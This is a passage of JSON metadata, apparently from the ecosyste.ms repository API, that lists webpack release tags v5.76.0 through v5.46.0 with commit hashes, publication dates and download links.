https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","publis